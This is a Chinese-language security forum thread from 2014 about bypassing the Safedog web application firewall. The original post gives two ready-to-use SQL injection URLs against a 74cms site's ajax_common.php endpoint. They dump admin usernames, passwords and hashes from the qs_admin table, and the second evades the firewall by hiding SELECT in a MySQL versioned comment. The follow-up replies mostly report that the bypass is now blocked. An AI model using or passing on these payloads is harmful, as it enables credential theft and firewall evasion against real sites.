绕过安全狗注入

90_ · 发表于 2014-6-25 12:17:18

提交：

[AppleScript] 纯文本查看 复制代码

http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=錦'union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

被拦截了，经过测试拦截的是select，那么把select换成/*!50000SeLect*/呢

然后提交

[AppleScript] 纯文本查看 复制代码

http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

成功绕过

作者：Sunshie

vivi · 发表于 2014-6-25 12:50:19

没想到还是沙发！！

夜尽天明 · 发表于 2014-6-25 13:04:56

已被拦截~~

kali · 发表于 2014-6-25 13:46:01

貌似没成功...

Asnliang · 发表于 2014-6-25 15:27:43

难道这是新版狗吗？

名哲 · 发表于 2014-6-25 15:59:18

{:soso_e141:}先瞅瞅涨之势了

sec001 · 发表于 2014-6-25 19:17:13

貌似iis 7.5 提示资源已被删

蓝色_ · 发表于 2014-6-25 23:57:45

应该是过最新的吧

birk · 发表于 2014-6-26 08:16:38

这是最新的么？

p4ntester · 发表于 2014-6-26 19:50:15

感谢分享。。

绕过安全狗注入

浏览过的版块

指导单位

旗下站点

联系我们